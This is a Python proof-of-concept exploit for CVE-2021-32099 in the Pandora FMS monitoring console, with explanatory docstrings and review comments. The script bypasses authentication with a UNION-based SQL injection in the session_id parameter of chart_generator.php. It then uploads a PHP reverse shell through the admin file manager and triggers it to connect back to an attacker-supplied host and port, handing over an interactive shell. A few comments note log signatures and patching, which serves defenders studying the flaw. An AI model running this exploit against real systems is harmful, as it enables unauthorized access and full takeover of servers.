POC / CVE-2021-32099.py PY
import argparse
import requests
from pwn import *

class PandoraFmsClient:
    """Thin wrapper around the HTTP requests this PoC sends to one Pandora FMS console.

    The steps are separate methods and are expected to run in the order ``main`` uses:
    ``bypass_authentication`` -> ``upload_reverse_shell`` -> ``execute_reverse_shell``.
    Each step prints a status line; the first two call ``exit(1)`` on failure, so there
    is no partial-recovery path.

    All requests share one ``requests.Session`` so cookies returned by the target persist
    across steps. No request sets a timeout, so an unresponsive target makes the script
    hang rather than fail.
    """

    def __init__(self, url):
        # Base URL of the console host (e.g. ``http://host``); every request below appends
        # ``/pandora_console/...``, so a trailing slash here would produce ``//`` in the path.
        self.__url = url
        # Shared session: cookies set by the target on one request are sent on the next.
        self.__session = requests.Session()

    def bypass_authentication(self):
        """Step 1: obtain an ``admin`` session without credentials (CVE-2021-32099).

        Sends a single unauthenticated GET to ``include/chart_generator.php`` whose
        ``session_id`` query parameter carries a UNION-based SQL injection. The injected
        row contains a serialized session fragment (``id_usuario|s:5:"admin";``), which
        the console presumably deserializes as session data for this cookie. Success is
        checked by fetching the console root with the same session and looking for
        ``var id_user = "admin";``; anything else prints ERROR and exits.

        Defensive notes: the request is easy to spot in web-server logs (that path with
        ``union SELECT`` in ``session_id``) and is a good candidate for a WAF/IDS rule;
        the real fix is upgrading to a Pandora FMS release that patches CVE-2021-32099.
        """
        print("[\033[1;32m+\033[0m] Bypassing authentication...", end='')
        sqli = "1' union SELECT 1,2,'id_usuario|s:5:\"admin\";' -- -"
        # Payload is interpolated raw (no URL-encoding); requests sends it as given.
        self.__session.get(f"{self.__url}/pandora_console/include/chart_generator.php?session_id=a{sqli}")
        if 'var id_user = "admin";' in self.__session.get(f"{self.__url}/pandora_console/").text:
            print("OK")
        else:
            print("ERROR")
            exit(1)

    def upload_reverse_shell(self):
        """Step 2: upload ``reverse_shell.php`` through the admin file manager.

        Reads ``reverse_shell.php`` from the current working directory (not part of this
        script; ``open`` raises ``FileNotFoundError`` if it is missing) and POSTs it with
        the form fields the file manager expects to ``godmode/setup/file_manager``.
        ``real_directory`` is a hard-coded absolute path on the target, so this only
        matches the default install layout. Success is judged by the filename appearing
        in the response body.

        Requires the admin session from ``bypass_authentication``. Server-side the
        artifact is a new ``.php`` file under ``pandora_console/images`` — a useful
        thing to monitor for, since that directory should not gain executable content.
        """
        print("[\033[1;32m+\033[0m] Uploading reverse shell...", end='')
        reverse_shell_file = "reverse_shell.php"
        with open(reverse_shell_file, "r") as f:
            data = {
                "umask": "",
                "decompress_sent": "1",
                "go": "Go",
                "real_directory": "/var/www/pandora/pandora_console/images",
                "directory": "images",
                # NOTE(review): hash/hash2 are copied as constants; their derivation is not
                # shown here — presumably tied to the directory fields above, confirm.
                "hash": "6427eed956c3b836eb0644629a183a9b",
                "hash2": "594175347dddf7a54cc03f6c6d0f04b4",
                "upload_file_or_zip": "1"
            }
            files = {
                "file": (reverse_shell_file, f)
            }
            response = self.__session.post(f"{self.__url}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager", data=data, files=files)
            if reverse_shell_file in response.text:
                print("OK")
            else:
                print("ERROR")
                exit(1)

    def execute_reverse_shell(self, lhost, lport):
        """Step 3: request the uploaded PHP file from a background thread.

        Runs ``__execute_reverse_shell`` on a ``threading.Thread`` (``threading`` is in
        scope via ``from pwn import *``) so the caller can block on its listener while the
        GET is in flight. The thread is started but never joined, and the GET has no
        timeout, so it may still be running when the caller finishes.
        """
        trigger_thread = threading.Thread(
            target=self.__execute_reverse_shell,
            kwargs={"lhost": lhost, "lport": lport}
        )
        trigger_thread.start()

    def __execute_reverse_shell(self, lhost, lport):
        # Name-mangled to _PandoraFmsClient__execute_reverse_shell; only the thread target
        # above calls it. lhost/lport are interpolated into the query string unescaped.
        # NOTE(review): the filename is duplicated here rather than shared with
        # upload_reverse_shell's ``reverse_shell_file``; keep the two in sync.
        print("[\033[1;32m+\033[0m] Executing reverse shell...")
        self.__session.get(f"{self.__url}/pandora_console/images/reverse_shell.php?lhost={lhost}&lport={lport}")

def parse_args():
    """Parse the command line for this script.

    Defines ``--target``, ``--lhost`` and ``--lport``. None of them is marked required,
    so a missing option simply yields ``None`` on the returned namespace. When the script
    is run with no arguments at all, the help text is printed and the process exits with
    status 1. ``-h``/``--help`` is disabled (``add_help=False``), so running with no
    arguments is the only way to see usage.

    Returns:
        argparse.Namespace with string-or-None attributes ``target``, ``lhost``, ``lport``.
    """
    script = sys.argv[0]
    parser = argparse.ArgumentParser(
        prog=f"python3 {script}",
        epilog=f"Example:\npython3 {script} --target http://target.com --lhost 10.10.14.157 --lport 4444",
        add_help=False,
    )
    options = (
        ("--target", "Full URL of the vulnerable Pandora FMS instance."),
        ("--lhost", "IP address where the reverse shell will connect back to (must be reachable by the target). The listener will bind to 0.0.0.0 internally."),
        ("--lport", "Port number the reverse shell listener will bind to."),
    )
    for flag, description in options:
        parser.add_argument(flag, help=description)
    # Only the bare invocation (argv holds just the script name) triggers the usage dump.
    if len(sys.argv) != 1:
        return parser.parse_args()
    parser.print_help()
    sys.exit(1)

def main():
    """Run the three PoC steps in order, then hand the connection to the operator.

    Ordering matters: the listener is bound *before* the trigger request is sent, and a
    one-second ``sleep`` gives it time to come up; ``execute_reverse_shell`` runs in a
    background thread so this function can block on ``wait_for_connection`` meanwhile.
    ``listen``, ``sleep`` and the thread machinery come from ``from pwn import *``.
    """
    args = parse_args()
    # NOTE(review): parse_args does not require any option. A missing --target reaches the
    # client as None (URLs become "None/pandora_console/..."), and a missing --lport makes
    # int(None) below raise TypeError.
    pandora_fms_client = PandoraFmsClient(args.target)
    pandora_fms_client.bypass_authentication()
    pandora_fms_client.upload_reverse_shell()
    listener = listen(int(args.lport))
    # Fixed delay rather than a readiness check; the thread started next races it.
    sleep(1)
    # lport is forwarded as the original string; only the listener needed an int.
    pandora_fms_client.execute_reverse_shell(args.lhost, args.lport)
    connection = listener.wait_for_connection()
    connection.interactive("")

if __name__ == "__main__":
    # Entry guard: main() runs only when executed as a script, not on import.
    main()